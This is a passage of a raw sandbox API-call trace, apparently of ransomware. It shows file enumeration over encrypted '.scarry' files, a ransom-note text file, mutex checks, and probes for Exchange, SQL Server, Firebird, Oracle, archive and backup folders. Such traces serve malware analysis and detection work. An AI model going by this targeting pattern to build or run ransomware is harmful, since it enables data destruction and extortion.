lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.091] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, 
nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0109.091] GetLastError () returned 0x12 [0109.091] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0109.091] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1e9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry", cAlternateFileName="AZQX0Q~1.SCA")) returned 1 [0109.092] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.092] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.092] GlobalLock (hMem=0x450004) returned 0x591988 [0109.092] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.092] GlobalUnlock (hMem=0x450004) returned 0 [0109.092] GlobalLock (hMem=0x450004) returned 0x591988 [0109.092] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.092] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.092] GlobalUnlock (hMem=0x450004) returned 0 [0109.092] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.092] GlobalUnlock (hMem=0x45000c) returned 0 [0109.092] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.092] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, 
ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry", cAlternateFileName="CR5RDW~1.SCA")) returned 1 [0109.092] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.092] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.092] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.092] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.092] GlobalUnlock (hMem=0x45000c) returned 0 [0109.092] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.092] GlobalLock (hMem=0x450004) returned 0x593998 [0109.092] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.092] GlobalUnlock (hMem=0x45000c) returned 0 [0109.092] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.092] GlobalUnlock (hMem=0x450004) returned 0 [0109.093] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.093] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0109.093] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.093] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 
[0109.093] GlobalLock (hMem=0x450004) returned 0x591988 [0109.093] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.093] GlobalUnlock (hMem=0x450004) returned 0 [0109.093] GlobalLock (hMem=0x450004) returned 0x591988 [0109.093] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.093] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.093] GlobalUnlock (hMem=0x450004) returned 0 [0109.093] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.093] GlobalUnlock (hMem=0x45000c) returned 0 [0109.093] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.093] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0xabd, dwReserved0=0x0, dwReserved1=0x0, cFileName="JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry", cAlternateFileName="JBFTMX~1.SCA")) returned 1 [0109.093] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.093] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.093] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.093] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.093] GlobalUnlock (hMem=0x45000c) returned 0 [0109.093] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.093] GlobalLock (hMem=0x450004) returned 0x593998 [0109.093] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.094] GlobalUnlock (hMem=0x45000c) returned 0 [0109.094] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.094] GlobalUnlock (hMem=0x450004) returned 0 [0109.094] OpenMutexA 
(dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.094] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b174, dwReserved0=0x0, dwReserved1=0x0, cFileName="n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry", cAlternateFileName="N9CDSS~1.SCA")) returned 1 [0109.094] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.094] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.094] GlobalLock (hMem=0x450004) returned 0x591988 [0109.094] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.094] GlobalUnlock (hMem=0x450004) returned 0 [0109.094] GlobalLock (hMem=0x450004) returned 0x591988 [0109.094] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.094] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.094] GlobalUnlock (hMem=0x450004) returned 0 [0109.094] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.094] GlobalUnlock (hMem=0x45000c) returned 0 [0109.094] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.094] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, 
dwReserved0=0x0, dwReserved1=0x0, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 1 [0109.094] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.094] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.094] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.094] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.095] GlobalUnlock (hMem=0x45000c) returned 0 [0109.095] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.095] GlobalLock (hMem=0x450004) returned 0x593998 [0109.095] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.095] GlobalUnlock (hMem=0x45000c) returned 0 [0109.095] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.095] GlobalUnlock (hMem=0x450004) returned 0 [0109.095] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.095] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0 [0109.095] GetLastError () returned 0x12 [0109.095] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.095] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0109.095] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0109.095] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0109.096] GlobalLock (hMem=0x450004) returned 0x591988 [0109.096] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.096] GlobalUnlock (hMem=0x450004) returned 0 [0109.096] GlobalLock (hMem=0x450004) returned 0x591988 [0109.096] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.096] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.096] GlobalUnlock (hMem=0x450004) returned 0 [0109.096] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.096] GlobalUnlock (hMem=0x45000c) returned 0 [0109.096] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.096] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.131] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.131] GlobalUnlock (hMem=0x45000c) returned 0 [0109.131] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.131] GlobalLock (hMem=0x450004) returned 0x593998 [0109.131] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.131] GlobalUnlock (hMem=0x45000c) returned 0 [0109.131] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.131] GlobalUnlock (hMem=0x450004) returned 0 [0109.131] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.131] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", len=0x33 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") 
returned 1 [0109.131] GlobalLock (hMem=0x450004) returned 0x591988 [0109.131] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.131] GlobalUnlock (hMem=0x450004) returned 0 [0109.131] GlobalLock (hMem=0x450004) returned 0x591988 [0109.131] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.131] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.131] GlobalUnlock (hMem=0x450004) returned 0 [0109.131] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.131] GlobalUnlock (hMem=0x45000c) returned 0 [0109.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@퇸X퇌X企@\x18㼔V\x18\x1b")) returned 0xffffffff [0109.193] GetLastError () returned 0x3 [0109.193] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0109.194] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: 
lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18㽜V\x181")) returned 0xffffffff [0109.194] GetLastError () returned 0x2 [0109.194] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0109.194] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@麌W企@\x18㟬X\x18;")) returned 0xffffffff [0109.195] GetLastError () returned 0x2 [0109.195] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") 
returned 0x34 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0109.195] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@퍴X企@\x18㧴X\x18D")) returned 0xffffffff [0109.195] GetLastError () returned 0x2 [0109.195] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0109.196] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, 
ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18麌W\x18j")) returned 0xffffffff [0109.196] GetLastError () returned 0x2 [0109.196] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0109.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0109.196] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@퍴X企@\x18㟬X\x18q")) returned 0xffffffff [0109.196] GetLastError () returned 0x2 [0109.197] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.197] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\麈WP") returned 6 [0109.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0109.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@堬X企@\x18㧴X\x18y")) returned 0xffffffff [0109.197] GetLastError () returned 0x2 [0109.197] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0109.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0109.198] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18㟬X\x18\x81")) returned 0xffffffff [0109.198] GetLastError () returned 0x2 [0109.198] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0109.198] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@퍴X企@\x18㧴X\x18\x88")) returned 0xffffffff [0109.198] GetLastError () returned 0x2 [0109.198] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㟨X ") 
returned 6 [0109.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0109.199] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", 